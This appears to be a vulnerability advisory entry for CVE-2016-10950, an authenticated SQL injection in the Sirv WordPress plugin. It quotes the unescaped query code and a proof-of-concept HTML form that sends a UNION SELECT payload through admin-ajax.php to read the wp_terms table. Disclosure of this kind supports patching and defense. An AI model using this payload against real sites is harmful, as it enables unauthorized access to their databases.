Lucene search
Lenon LeiteWPEX-ID:55995FE7-45E6-4C75-88B6-D89B2A3C9725HistoryNov 10, 2016 - 12:00 a.m.
Sirv <= 1.3.1 - Authenticated SQL Injection
2016-11-1000:00:00
Lenon Leite
6
0.002 Low
EPSS
Percentile
59.5%
$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every registered user. $id = $_POST[‘row_id’]; $row = $wpdb->get_row(“SELECT * FROM $table_name WHERE id = $id”, ARRAY_A); $row[‘images’] = unserialize($row[‘images’]); echo json_encode($row);
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="sirv_get_row_by_id">
<input type="submit" value="Send">
</form>Related
nvd
nvd
CVE-2016-10950
2019-09-13 13:15:10
wpvulndb
wpvulndb
Sirv <= 1.3.1 - Authenticated SQL Injection
2016-11-10 00:00:00
cvelist
cvelist
CVE-2016-10950
2019-09-13 12:08:37
cve
cve
CVE-2016-10950
2019-09-13 13:15:10
prion
prion
Sql injection
2019-09-13 13:15:00